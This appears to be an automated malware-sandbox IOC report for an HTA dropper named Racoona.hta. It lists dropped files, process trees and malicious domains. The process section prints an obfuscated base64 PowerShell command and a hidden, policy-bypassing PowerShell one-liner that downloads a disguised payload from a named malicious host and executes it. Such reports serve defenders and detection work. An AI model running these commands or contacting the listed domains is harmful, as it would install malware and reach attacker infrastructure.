IOC Report
Racoona.hta

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps12108642010010Label

Files

File Path
Type
Category
Malicious
Download
Racoona.hta
exported SGML document, ASCII text, with very long lines (380), with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_010uix5z.ak1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x3bw3pt.wt4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rp4jxyv.mcs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjrkbzn4.rh3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzqufefj.s1f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm3c2ak4.dj4.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\Racoona.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC IAAuACgAIAAkAHAAUwBoAE8AbQBlAFsANABdACsAJABwAHMASABPAG0AZQBbADMANABdACsAJwB4ACcAKQAgACgAKAAgAFsAUgB1AG4AdABpAG0AZQAuAGkATgBUAEUAcgBPAHAAUwBlAFIAVgBJAEMAZQBTAC4ATQBBAHIAUwBoAEEAbABdADoAOgBQAHQAUgBUAG8AcwB0AFIASQBOAGcAQQBOAFMASQAoACAAWwBSAHUAbgBUAGkAbQBFAC4AaQBOAFQARQByAE8AUABTAEUAcgB2AGkAYwBFAHMALgBNAGEAUgBzAGgAYQBsAF0AOgA6AFMAZQBjAHUAcgBFAFMAVAByAEkATgBnAFQATwBHAEwATwBCAEEATABBAEwATABvAGMAYQBOAFMASQAoACAAJAAoACcANwA2ADQAOQAyAGQAMQAxADEANgA3ADQAMwBmADAANAAyADMANAAxADMAYgAxADYAMAA1ADAAYQA1ADMANAA1AE0AZwBCADgAQQBGAG8AQQBXAEEAQgByAEEARQBNAEEAUwBBAEIAegBBAEQAVQBBAFIAQQBCAEIAQQBFAEUAQQBhAHcAQgB3AEEARQBNAEEATgBBAEIAaQBBAEcATQBBAFUAUQBCAHYAQQBHAEUAQQBjAEEAQgBNAEEARQBFAEEAUABRAEEAOQBBAEgAdwBBAFoAUQBBAHgAQQBEAGMAQQBPAFEAQQAyAEEARABNAEEAWgBnAEEAeQBBAEQAWQBBAE4AZwBCAGoAQQBHAE0AQQBOAEEAQQB5AEEARABRAEEATQBnAEEAMABBAEQAZwBBAE0AZwBCAG0AQQBHAFkAQQBZAGcAQQA1AEEARABnAEEATQB3AEIAbABBAEcAWQBBAE0AQQBCAG0AQQBHAFUAQQBZAHcAQQAzAEEARABrAEEAWgBnAEEAMwBBAEQAWQBBAFkAZwBCAGgAQQBEAGMAQQBOAEEAQgBqAEEARwBZAEEAWQBRAEEAeQBBAEQAQQBBAE4AUQBBAHgAQQBEAEEAQQBaAGcAQQB5AEEARwBVAEEAWQB3AEEAegBBAEQAUQBBAE8AQQBCAGsAQQBHAEkAQQBaAEEAQQAwAEEARwBRAEEATQBBAEIAagBBAEcARQBBAFoAUQBBADEAQQBHAFUAQQBZAHcAQQB6AEEARABjAEEAWQBnAEIAbABBAEQAZwBBAE0AUQBBADMAQQBHAE0AQQBaAGcAQgBrAEEARABJAEEATwBRAEEANABBAEQAUQBBAE0AZwBCAGoAQQBEAFkAQQBaAGcAQQB4AEEARwBZAEEATQBBAEEAMQBBAEQARQBBAFkAUQBBADEAQQBHAEkAQQBaAEEAQQB5AEEARwBZAEEATgBRAEIAawBBAEQATQBBAE0AZwBBADQAQQBEAGMAQQBZAHcAQQB4AEEARABRAEEATQB3AEIAagBBAEcARQBBAE4AQQBCAGkAQQBEAEkAQQBNAEEAQQB3AEEARABVAEEAWgBRAEEAegBBAEcAWQBBAE8AQQBCAGsAQQBEAFEAQQBaAEEAQQAzAEEARABJAEEAWQBnAEIAaQBBAEQATQBBAE4AZwBBADEAQQBHAEUAQQBaAFEAQQB4AEEARABnAEEATwBBAEIAaQBBAEQAQQBBAFoAUQBBADEAQQBEAE0AQQBOAHcAQgBsAEEARABBAEEATgB3AEEAeQBBAEQAQQBBAE0AZwBBADUAQQBHAFUAQQBZAHcAQgBsAEEARABJAEEAWgBBAEEANQBBAEQAWQBBAE8AUQBBAHgAQQBEAFkAQQBPAFEAQQA1AEEARwBZAEEATgBRAEIAbQBBAEcARQBBAE8AUQBBADQAQQBHAFkAQQBNAHcAQQAxAEEARABJAEEATQBnAEIAawBBAEQAWQBBAFkAdwBBAHkAQQBHAFUAQQBZAHcAQgBtAEEARABJAEEATgB3AEEAMABBAEcARQBBAE0AdwBBAHgAQQBHAE0AQQBOAFEAQQAyAEEARABZAEEAWQBRAEIAawBBAEcAWQBBAFkAUQBBADMAQQBHAEkAQQBNAFEAQgBtAEEARwBJAEEATQBnAEIAaABBAEQARQBBAFoAUQBCAG0AQQBEAFUAQQBOAEEAQQB5AEEARwBNAEEATQB3AEEAMQBBAEcASQBBAE8AQQBCAGgAQQBHAFEAQQBZAFEAQQA1AEEARwBVAEEATQBnAEEAegBBAEcATQBBAE8AUQBBADUAQQBHAEkAQQBNAGcAQQB5AEEARABRAEEATwBBAEEAdwBBAEQAYwBBAFkAUQBBAHcAQQBEAFEAQQBNAEEAQQB6AEEARABrAEEAWgBRAEIAbABBAEcAVQBBAE4AQQBBADQAQQBHAFkAQQBaAGcAQQB4AEEARABFAEEATgBBAEIAbQBBAEQAYwBBAFkAZwBCAG0AQQBEAEUAQQBNAFEAQgBsAEEARwBFAEEAWQBnAEEAeABBAEcASQBBAFkAUQBBAHkAQQBHAFEAQQBNAHcAQQA1AEEARwBZAEEATQBRAEEAMwBBAEQAZwBBAE0AUQBBAHoAQQBEAEUAQQBNAFEAQgBpAEEARABrAEEAWQBnAEIAawBBAEQAYwBBAE0AZwBCAGwAQQBHAFkAQQBOAFEAQgBrAEEARABFAEEATQB3AEIAaABBAEQAZwBBAE8AQQBBADMAQQBHAE0AQQBNAFEAQQB4AEEARABNAEEATQBBAEIAbABBAEQARQBBAE0AQQBCAG0AQQBHAFEAQQBNAGcAQgBoAEEARABZAEEATgBRAEEAeABBAEcATQBBAE0AdwBCAGwAQQBHAFUAQQBNAEEAQgBtAEEARABFAEEATQB3AEEAeQBBAEcATQBBAE4AZwBBADAAQQBHAFEAQQBOAGcAQgBtAEEARABFAEEATQB3AEEAMwBBAEQASQBBAE4AdwBCAGsAQQBEAEEAQQBNAFEAQQAwAEEARABnAEEATQBRAEIAbQBBAEQAWQBBAE0AZwBBADMAQQBHAFEAQQBNAHcAQgBoAEEARwBVAEEATgB3AEIAagBBAEcARQBBAFkAdwBCAG0AQQBEAGcAQQBNAGcAQQA1AEEARwBRAEEATQBBAEEANQBBAEQATQBBAFoAUQBCAGkAQQBEAGcAQQBNAGcAQQAzAEEARwBZAEEATgBnAEIAagBBAEQAQQBBAE4AdwBBADEAQQBHAFEAQQBPAEEAQgBpAEEARABFAEEATwBRAEIAbQBBAEcARQBBAFoAZwBCAGwAQQBEAEUAQQBZAHcAQQA0AEEARABVAEEAWgBRAEIAagBBAEQATQBBAE8AQQBBADUAQQBHAFkAQQBPAEEAQgBoAEEARABFAEEATgBBAEIAbQBBAEQAYwBBAE8AUQBBAHoAQQBHAE0AQQBZAHcAQQAwAEEARwBRAEEATwBRAEIAbABBAEQARQBBAE0AQQBCAGwAQQBEAEUAQQBaAFEAQgBsAEEARwBFAEEATgB3AEIAbABBAEQASQBBAFkAZwBBADUAQQBEAEEAQQBNAFEAQQAzAEEARwBFAEEATQB3AEEAMQBBAEQAQQBBAE8AUQBCAGwAQQBEAE0AQQBZAFEAQQAzAEEARABnAEEATQB3AEEAMABBAEcAUQBBAFoAQQBBADUAQQBEAGcAQQBaAEEAQgBrAEEARABnAEEAWQBnAEIAbQBBAEcAUQBBAE8AQQBBAHoAQQBHAEUAQQBZAGcAQgBoAEEARwBNAEEAWgBBAEEAMwBBAEcAWQBBAE8AQQBBAHkAQQBEAGMAQQBNAHcAQQB6AEEARABBAEEATgBBAEEAMwBBAEcATQBBAE0AUQBBADMAQQBEAFkAQQBOAGcAQgBoAEEARwBVAEEATgBnAEEAMQBBAEcAUQBBAE4AdwBBAHoAQQBHAE0AQQBNAEEAQgBoAEEARABFAEEAWgBnAEIAbQBBAEQAawBBAFoAZwBBADAAQQBEAE0AQQBNAFEAQQAzAEEARABFAEEATgBRAEEAMQBBAEQATQBBAFkAdwBBAHgAQQBHAFkAQQBaAGcAQQA0AEEARABjAEEATgBBAEIAaABBAEQAawBBAE4AQQBBAHkAQQBEAEkAQQBaAFEAQgBpAEEARABFAEEATQBBAEEAMQBBAEQAawBBAFkAUQBCAGkAQQBEAGMAQQBNAGcAQQA1AEEARwBNAEEATgBBAEIAbQBBAEcARQBBAFoAZwBCAGgAQQBEAFUAQQBOAEEAQgBpAEEARABNAEEATgB3AEIAawBBAEQATQBBAFkAZwBBAHgAQQBHAE0AQQBZAHcAQQB6AEEARwBNAEEATwBBAEIAagBBAEcAVQBBAFoAZwBBAHoAQQBEAFUAQQBNAFEAQQA0AEEARABFAEEATgBBAEEAMwBBAEcAVQBBAFoAUQBCAGsAQQBHAEUAQQBOAFEAQgBtAEEARABNAEEAWgBRAEEAdwBBAEcATQBBAE0AdwBBAHcAQQBEAEUAQQBNAEEAQQB5AEEARABnAEEAWQBnAEEAeQBBAEcAWQBBAE0AQQBCAGoAQQBHAFEAQQBOAHcAQgBoAEEARwBJAEEAWQBnAEEAegBBAEQAZwBBAFkAUQBBAHcAQQBHAFEAQQBaAGcAQgBoAEEARwBZAEEATQBRAEEANABBAEQAZwBBAE4AQQBCAGoAQQBEAGMAQQBPAFEAQgBrAEEARABVAEEAWQBRAEEANQBBAEQARQBBAE0AdwBBADEAQQBHAFEAQQBZAHcAQgBsAEEARABrAEEATgBBAEEAegBBAEQARQBBAFoAZwBBAHgAQQBEAFUAQQBNAGcAQgBtAEEARABBAEEAWQBnAEEAegBBAEQAUQBBAFkAZwBBADQAQQBEAE0AQQBZAHcAQQA0AEEARABZAEEATQB3AEEAeQBBAEcAUQBBAFoAQQBBADMAQQBHAEUAQQBaAFEAQQA1AEEARwBVAEEATQBnAEEAMgBBAEcAWQBBAFoAUQBBADUAQQBEAEkAQQBaAGcAQQAwAEEARABFAEEAWgBBAEEAMABBAEQAUQBBAE0AQQBCAGwAQQBHAEUAQQBNAFEAQgBpAEEARwBZAEEATQBRAEEAMABBAEcATQBBAE4AdwBBADAAQQBEAEUAQQBNAGcAQQB3AEEARABRAEEATgBRAEEAMwBBAEQAawBBAE0AQQBBADEAQQBHAE0AQQBNAGcAQQB4AEEARwBRAEEAWgBnAEEANABBAEcARQBBAE4AQQBBAHcAQQBEAGcAQQBPAEEAQQAzAEEARABnAEEAWgBRAEEANABBAEcATQBBAE4AZwBBADIAQQBEAFEAQQBNAFEAQgBpAEEARABVAEEATwBBAEIAbQBBAEQAWQBBAE4AdwBBAHcAQQBHAEkAQQBNAEEAQQB3AEEARwBRAEEAWgBBAEIAaABBAEcAWQBBAFkAZwBCAGsAQQBHAFEAQQBNAGcAQQB3AEEARABVAEEATgBBAEIAbQBBAEQAZwBBAFoAQQBBAHoAQQBHAFEAQQBaAGcAQQA1AEEARwBFAEEATgB3AEEANABBAEQARQBBAE0AUQBCAGoAQQBEAGsAQQBOAFEAQQB6AEEARwBVAEEAWgBRAEIAbQBBAEQASQBBAE0AdwBBADMAQQBEAFkAQQBOAEEAQQAwAEEARwBRAEEATQBRAEEAeABBAEQAVQBBAE0AQQBCAGoAQQBEAGMAQQBPAFEAQQB6AEEARABjAEEATQBnAEEAeABBAEcAWQBBAE4AZwBBADUAQQBEAFUAQQBOAEEAQQAyAEEARABJAEEAWQBRAEIAawBBAEcAWQBBAE4AQQBCAG0AQQBHAFkAQQBNAFEAQQA0AEEARABnAEEATgBBAEIAagBBAEcARQBBAFoAQQBBADAAQQBHAFUAQQBOAHcAQQB4AEEARABRAEEAWgBnAEEAMQBBAEcASQBBAE4AZwBBADUAQQBEAGMAQQBaAGcAQQAwAEEARABVAEEAWQB3AEEANABBAEQASQBBAE0AUQBBAHkAQQBHAEkAQQBaAEEAQgBqAEEARABBAEEAWQBnAEIAaQBBAEcATQBBAE0AZwBBADUAQQBEAGMAQQBOAGcAQQB5AEEARABBAEEATQBBAEEAMABBAEQAUQBBAFkAZwBCAGgAQQBHAE0AQQBaAFEAQQB5AEEARwBFAEEAWQB3AEEANABBAEQAVQBBAFoAZwBCAGwAQQBHAE0AQQBaAFEAQgBpAEEARABJAEEATQBRAEIAagBBAEQAawBBAFkAdwBBAHoAQQBEAGMAQQBPAFEAQQB6AEEARABFAEEAWQB3AEIAbABBAEQAZwBBAFoAUQBCAGoAQQBHAFEAQQBZAGcAQQAwAEEARABjAEEATgBBAEIAbQBBAEQAYwBBAFkAdwBCAGkAQQBEAFkAQQBZAGcAQgBsAEEARwBFAEEATgB3AEEAMwBBAEcAVQBBAFoAQQBBAHcAQQBEAGcAQQBOAEEAQQB5AEEARABZAEEATwBBAEIAawBBAEcAWQBBAE4AdwBCAGgAQQBEAEkAQQBOAEEAQgBoAEEARwBVAEEAWgBnAEEANABBAEQASQBBAFkAdwBBADAAQQBHAFEAQQBPAEEAQQA1AEEARABZAEEATwBBAEEAegBBAEQAUQBBAE8AUQBBAHcAQQBHAE0AQQBNAHcAQgBpAEEARABZAEEATgBBAEEAdwBBAEQAYwBBAFoAUQBBAHcAQQBHAEUAQQBOAGcAQQB3AEEARABjAEEAWQB3AEEAeQBBAEQAawBBAE0AZwBCAG0AQQBHAE0AQQBNAGcAQQB3AEEARABZAEEATQB3AEEAeABBAEQAWQBBAE4AQQBBAHgAQQBEAEEAQQBOAHcAQQB3AEEARwBNAEEAWQBnAEIAagBBAEcAVQBBAE8AUQBCAGgAQQBEAGcAQQBNAFEAQgBoAEEARwBZAEEATQB3AEIAbABBAEQAWQBBAE0AQQBBADEAQQBHAFEAQQBZAGcAQQAyAEEARwBRAEEAWgBRAEEAMABBAEQAYwBBAE0AdwBBADMAQQBEAGMAQQBZAFEAQQA0AEEARwBJAEEATgBnAEEAdwBBAEQATQBBAFoAZwBBAHgAQQBHAFkAQQBaAFEAQgBoAEEARABFAEEATQBBAEEANQBBAEcARQBBAE4AUQBBAHgAQQBEAFEAQQBPAFEAQQB6AEEARABVAEEAWgBRAEEAMABBAEcAWQBBAE8AQQBBADMAQQBEAFUAQQBOAEEAQQB6AEEARABNAEEAWgBRAEIAaABBAEQAYwBBAFoAQQBBAHkAQQBEAGMAQQBaAEEAQQB4AEEARwBNAEEATwBBAEIAbQBBAEcASQBBAE0AZwBCAGoAQQBEAEUAQQBNAEEAQQAyAEEARwBZAEEATQBRAEEAdwBBAEQAYwBBAFkAZwBBADMAQQBEAGMAQQBPAEEAQgBrAEEARwBJAEEATQB3AEEAMwBBAEQASQBBAFkAUQBBAHcAQQBHAEUAQQBOAEEAQgBtAEEARABBAEEAWgBnAEIAaABBAEcASQBBAFoAQQBCAGgAQQBHAEkAQQBNAFEAQQAwAEEARwBFAEEAWQBnAEEAdwBBAEQATQBBAE0AZwBBAHcAQQBEAEEAQQBOAHcAQQAxAEEARABrAEEATgBBAEIAagBBAEQARQBBAE4AUQBCAGsAQQBEAGMAQQBNAGcAQgBrAEEARABnAEEAWgBBAEEAMgBBAEQAVQBBAE4AQQBCAGwAQQBHAE0AQQBNAGcAQgBrAEEARwBZAEEAWgBnAEEANQBBAEQAWQBBAFoAUQBBADMAQQBEAE0AQQBNAHcAQQAyAEEARABFAEEAWgBRAEEANABBAEQAVQBBAFkAdwBBADIAQQBEAEEAQQBaAEEAQgBsAEEARwBZAEEATwBBAEEANQBBAEQATQBBAE0AQQBBAHcAQQBHAEkAQQBZAHcAQQB4AEEARABJAEEATgBRAEIAaQBBAEQAQQBBAE8AUQBBADUAQQBEAEkAQQBNAGcAQQAwAEEARwBJAEEATgB3AEEAMABBAEcASQBBAFoAZwBBADEAQQBEAEUAQQBNAFEAQgBsAEEARABFAEEAWgBBAEEAeQBBAEQASQBBAFoAZwBBAHgAQQBHAFUAQQBOAFEAQgBrAEEARwBJAEEAWQBRAEEAeQBBAEcATQBBAE0AQQBCAGoAQQBEAEkAQQBOAEEAQQAzAEEARABBAEEATgBBAEEAegBBAEQAawBBAFkAZwBCAGgAQQBEAFUAQQBNAFEAQQB4AEEARwBZAEEATwBBAEIAawBBAEQAVQBBAFkAUQBCAGsAQQBEAFkAQQBOAEEAQgBpAEEARwBRAEEATwBRAEEANABBAEQAUQBBAE0AZwBCAGoAQQBEAEkAQQBOAFEAQQAwAEEARABNAEEAWQB3AEIAaABBAEQARQBBAFoAUQBCAGwAQQBHAEkAQQBaAGcAQQB5AEEARABRAEEATQBBAEEAdwBBAEQARQBBAE8AUQBCAGsAQQBEAFEAQQBOAEEAQQB4AEEARABZAEEATQBBAEEAdwBBAEQARQBBAFoAZwBCAGsAQQBEAEEAQQBOAGcAQgBoAEEARABjAEEATQB3AEEAdwBBAEQAawBBAFkAZwBBADIAQQBHAEkAQQBaAFEAQQAwAEEARABRAEEATwBBAEEANABBAEQASQBBAE0AZwBCAGoAQQBEAEUAQQBZAFEAQgBrAEEARwBNAEEAWgBnAEIAaQBBAEQASQBBAE4AUQBBADAAQQBEAFkAQQBZAFEAQgBpAEEARABrAEEAWgBnAEIAawBBAEQAWQBBAE4AZwBBADIAQQBEAGcAQQBZAGcAQgBtAEEARwBZAEEATwBBAEEAeQBBAEQAVQBBAE0AUQBCAGgAQQBEAGsAQQBZAGcAQQAxAEEARABrAEEAWgBRAEEAdwBBAEQARQBBAFkAZwBCAG0AQQBEAFUAQQBZAHcAQQAzAEEARABVAEEATQB3AEIAaQBBAEQAQQBBAE0AUQBBADQAQQBHAFUAQQBNAEEAQQA1AEEARwBZAEEAWQBnAEEANABBAEQAawBBAFkAZwBBAHkAQQBEAFUAQQBOAHcAQQB5AEEARwBJAEEATQBRAEIAaQBBAEQAUQBBAE4AUQBCAGwAQQBHAE0AQQBOAGcAQgBsAEEARwBZAEEATwBRAEEAMQBBAEcAUQBBAE4AUQBCAGkAQQBHAFUAQQBaAEEAQgBrAEEARwBVAEEAWQB3AEIAawBBAEcARQBBAFkAdwBBADMAQQBEAGMAQQBPAEEAQQB4AEEARwBFAEEATgBRAEIAbQBBAEcARQBBAFkAUQBBAHcAQQBEAEEAQQBZAHcAQQAxAEEARwBVAEEATQB3AEEAeABBAEQAYwBBAFkAZwBBADQAQQBEAGcAQQBOAFEAQQA1AEEARABrAEEATgB3AEEAegBBAEcAUQBBAFoAZwBBADIAQQBHAFUAQQBNAFEAQQAxAEEARwBFAEEATgBRAEIAaQBBAEcAWQBBAFoAZwBCAGoAQQBEAFEAQQBZAGcAQQAxAEEARwBRAEEATQBnAEEANABBAEQAQQBBAFkAUQBBAHgAQQBEAFkAQQBaAGcAQQB5AEEARwBNAEEAWQB3AEEANABBAEQASQBBAE0AQQBBADMAQQBHAEkAQQBOAGcAQQAxAEEARwBFAEEATQBBAEEANQBBAEQARQBBAFoAUQBBADQAQQBHAEkAQQBNAFEAQQB6AEEARABrAEEATwBRAEIAaQBBAEQAWQBBAE4AZwBBADAAQQBEAGcAQQBOAFEAQQA0AEEARwBJAEEATQBRAEIAagBBAEcARQBBAFoAQQBCAGoAQQBEAGsAQQBNAEEAQQB3AEEARwBRAEEAWQBnAEEAeQBBAEcAUQBBAFkAUQBBADQAQQBHAEkAQQBZAGcAQgBoAEEARABrAEEATQBRAEEAMQBBAEcAVQBBAFoAZwBCAGwAQQBEAFEAQQBOAFEAQQB5AEEARwBJAEEATQBnAEIAbQBBAEcAVQBBAE0AUQBCAGwAQQBEAGMAQQBZAGcAQQA0AEEARwBNAEEAWQB3AEIAbQBBAEQAVQBBAE0AdwBCAGkAQQBEAEEAQQBNAEEAQQB4AEEARABBAEEATQB3AEIAaQBBAEQAVQBBAFkAUQBBAHcAQQBHAEUAQQBOAFEAQQB4AEEARABjAEEATQBRAEIAaQBBAEcARQBBAE0AUQBCAGoAQQBEAFUAQQBZAHcAQQAzAEEARABRAEEATgB3AEEAdwBBAEcAWQBBAE8AUQBBADEAQQBEAFUAQQBZAHcAQQAyAEEARABFAEEATgBRAEIAaQBBAEcASQBBAE8AUQBBADMAQQBEAE0AQQBaAFEAQQAyAEEARABnAEEAWgBnAEEAegBBAEQAYwBBAE0AQQBCAG0AQQBHAEUAQQBZAGcAQQAwAEEARwBRAEEATgB3AEEAdwBBAEQAZwBBAE4AZwBCAGwAQQBHAE0AQQBNAFEAQQB3AEEARwBRAEEAWQB3AEEAMwBBAEcAVQBBAE0AdwBBADAAQQBEAFUAQQBZAGcAQQA0AEEARABJAEEAWQB3AEIAbQBBAEQAZwBBAE8AQQBBADMAQQBEAGsAQQBaAFEAQgBoAEEARABVAEEAWgBRAEEAegBBAEQAYwBBAFoAUQBCAGkAQQBEAE0AQQBOAEEAQgBtAEEARwBVAEEAWQB3AEEAeABBAEQAQQBBAE8AUQBCAGkAQQBHAFkAQQBaAFEAQgBsAEEARwBNAEEATQBRAEIAaQBBAEQAWQBBAE4AdwBBAHkAQQBHAFUAQQBNAGcAQgBtAEEARABVAEEATwBRAEEAeABBAEQARQBBAFoAQQBCAGwAQQBEAGcAQQBOAGcAQgBrAEEARwBNAEEAWQBRAEEAMgBBAEQAVQBBAFkAdwBBAHcAQQBHAFkAQQBaAGcAQQB3AEEARABFAEEAWQBRAEEANABBAEQAQQBBAFoAUQBBAHgAQQBEAGMAQQBNAGcAQQAxAEEARABjAEEATwBBAEEANABBAEQASQBBAFoAUQBCAGgAQQBHAE0AQQBNAEEAQQB5AEEARABrAEEATgBnAEEAMgBBAEQAVQBBAFoAQQBBADAAQQBEAFkAQQBZAHcAQgBsAEEARABZAEEAWgBRAEIAaABBAEcAVQBBAFkAdwBCAGsAQQBHAEkAQQBNAFEAQQA1AEEARwBZAEEATQBBAEIAawBBAEQAZwBBAFkAdwBCAG0AQQBEAGMAQQBZAHcAQQAyAEEARwBNAEEATQBBAEEANABBAEQASQBBAE4AZwBBADUAQQBEAGsAQQBaAFEAQgBtAEEARwBFAEEAWQBnAEIAagBBAEQAZwBBAE0AZwBBAHgAQQBEAEEAQQBaAEEAQQB3AEEARwBFAEEATQB3AEEAeABBAEcASQBBAFoAZwBCAGkAQQBEAE0AQQBOAEEAQQA1AEEARABRAEEAWgBBAEEAeQBBAEcAVQBBAE4AdwBCAGwAQQBHAFUAQQBOAFEAQQA0AEEARABFAEEATQBRAEIAaQBBAEcAWQBBAFoAZwBBADUAQQBEAFkAQQBZAHcAQQAwAEEARABjAEEATQBRAEEAMQBBAEQAQQBBAE0AZwBBAHkAQQBEAGsAQQBPAEEAQgBrAEEARwBFAEEATgBBAEEAMABBAEQAWQBBAE8AQQBBADEAQQBHAE0AQQBZAFEAQQB4AEEARABVAEEAWQBRAEEANQBBAEQAYwBBAE4AUQBBADIAQQBEAFkAQQBZAGcAQgBqAEEARwBJAEEAWgBnAEEAegBBAEQAZwBBAE8AUQBBADEAQQBHAFkAQQBOAFEAQgBqAEEARABrAEEATQBnAEIAaQBBAEQAYwBBAFkAUQBBAHgAQQBEAGMAQQBNAGcAQgBoAEEARABVAEEATQBBAEEAegBBAEcASQBBAE8AUQBCAGwAQQBEAE0AQQBOAFEAQQA1AEEARABjAEEAWgBRAEEAMwBBAEcARQBBAFkAUQBBADQAQQBHAE0AQQBNAHcAQQAzAEEARABVAEEAWQB3AEIAbABBAEcARQBBAE4AQQBCAGkAQQBEAGsAQQBNAFEAQgBqAEEARwBVAEEATgB3AEEAMQBBAEcASQBBAFoAZwBBADEAQQBEAFUAQQBNAGcAQQB5AEEARABjAEEAWQB3AEEANABBAEQAUQBBAE8AUQBCAGgAQQBEAE0AQQBPAEEAQQAxAEEARABrAEEAWgBBAEEAegBBAEQAVQBBAFoAQQBBADEAQQBEAEUAQQBZAFEAQQAyAEEARABBAEEAWQBnAEEAdwBBAEQATQBBAE4AZwBBADEAQQBHAFUAQQBaAFEAQgBoAEEARwBJAEEATwBBAEEAMQBBAEQAQQBBAE8AUQBBADAAQQBEAFEAQQBNAGcAQQB5AEEARABNAEEAWgBRAEEAMgBBAEQAWQBBAE0AZwBBAHgAQQBHAFUAQQBZAHcAQQAwAEEARABRAEEAWQBRAEEAeQBBAEQAYwBBAFoAZwBBADQAQQBHAE0AQQBNAFEAQQB3AEEARABnAEEAWgBRAEIAbABBAEQATQBBAE0AdwBCAGsAQQBEAFEAQQBZAHcAQQB6AEEARwBRAEEATgB3AEEAeABBAEcAUQBBAE4AUQBBADQAQQBEAFEAQQBaAEEAQgBtAEEARABNAEEATwBRAEEAdwBBAEQASQBBAFoAZwBBADQAQQBHAE0AQQBOAHcAQgBpAEEARABrAEEAWQB3AEIAawBBAEQAWQBBAE8AQQBBADUAQQBEAE0AQQBOAGcAQQA1AEEARABjAEEATgBnAEIAbABBAEcATQBBAE0AQQBBAHcAQQBEAE0AQQBaAFEAQgBrAEEARABNAEEAWgBRAEEAMwBBAEQAawBBAE0AZwBCAGsAQQBHAFkAQQBNAHcAQQB6AEEARwBJAEEATQBnAEEAMQBBAEQAawBBAE4AdwBBADIAQQBEAFUAQQBNAEEAQgBpAEEARwBRAEEAWQBnAEEANABBAEQAQQBBAFkAdwBBAHoAQQBHAFkAQQBNAHcAQgBsAEEARwBFAEEATwBBAEIAaQBBAEQASQBBAE4AQQBBAHkAQQBEAGsAQQBNAHcAQQAxAEEARwBJAEEAWQBnAEIAaABBAEQAWQBBAFkAUQBBAHgAQQBEAGcAQQBOAHcAQQB4AEEARABrAEEATgBRAEEAMgBBAEcASQBBAE4AdwBBADUAQQBEAGMAQQBZAFEAQQB4AEEARABjAEEAWgBnAEEAMgBBAEQAawBBAFkAUQBBADEAQQBHAEkAQQBOAGcAQgBsAEEARwBZAEEATgBBAEIAbQBBAEQASQBBAE0AZwBBAHgAQQBHAFUAQQBaAEEAQgBrAEEARABjAEEATQB3AEIAbABBAEQAWQBBAFoAZwBCAGwAQQBEAE0AQQBOAFEAQgBoAEEARwBFAEEATgBnAEIAbQBBAEQAWQBBAFoAUQBBAHoAQQBEAFkAQQBaAFEAQQA0AEEARwBJAEEAWQB3AEEAdwBBAEQATQBBAFkAZwBBAHcAQQBEAFUAQQBaAGcAQQB4AEEARABJAEEATgBBAEEANQBBAEcAWQBBAFkAUQBCAGoAQQBEAE0AQQBPAFEAQQB3AEEARABJAEEAJwB8ACAAYwBvAE4AdgBlAFIAVAB0AE8ALQBzAEUAQwB1AHIAZQBTAHQAUgBpAG4AZwAgACAALQBLACAAIAAyADQANAAsADEAOQAzACwAMQAwADIALAAxADkANwAsADIAMgAyACwAMgAzACwAMQAwADAALAA5ADMALAA4ADAALAAxADgAOQAsADYAMAAsADIAMgA0ACwAMgAwADgALAAxADIAOQAsADYAOQAsADgAMAAsADIANQA1ACwAMwA1ACwAOQAsADIAMwA2ACwAMQAyADQALAAyADQALAAzADIALAA2ADMALAAyADQAMgAsADIANAA5ACwAMQAwADgALAAyADQAMAAsADEAMQAyACwAMgA0ADAALAA3ADEALAAxADMANAApACAAKQAgACkAKQApACAA
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:7y ([Net.WebClient]::New());SV w 'https://56wdf7avyu.kliplytd.shop/e290ec7eeb84ea465f4d2e1441fec32d1.png';&(Alias I*X) (ChildItem Variable:\7y).Value.(((([Net.WebClient]::New()|Member)|Where-Object{(Variable _).Value.Name -clike '*wn*g'}).Name))((ChildItem Variable:/w).Value)
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
suggestyuoz.biz
malicious
https://56wdf7avyu.kliplytd.shop
unknown
malicious
toppyneedus.biz
malicious
https://knowninshea.shop/api
104.21.42.34
malicious
pleasedcfrown.biz
malicious
https://56wdf7avyu.kliplytd.shop/e290ec7eeb84ea465f4d2e1441fec32d1.png
104.21.96.1
malicious
affordtempyo.biz
malicious
lightdeerysua.biz
malicious
impolitewearr.biz
malicious
mixedrecipew.biz
malicious
hoursuhouy.biz
malicious
knowninshea.shop
malicious
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://knowninshea.shop/apis7
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://knowninshea.shop/
unknown
https://knowninshea.shop/s
unknown
https://www.filehelpers.net/mustread/
unknown
https://github.com/Pester/Pester
unknown
https://knowninshea.shop/apis
unknown
https://knowninshea.shop/D
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
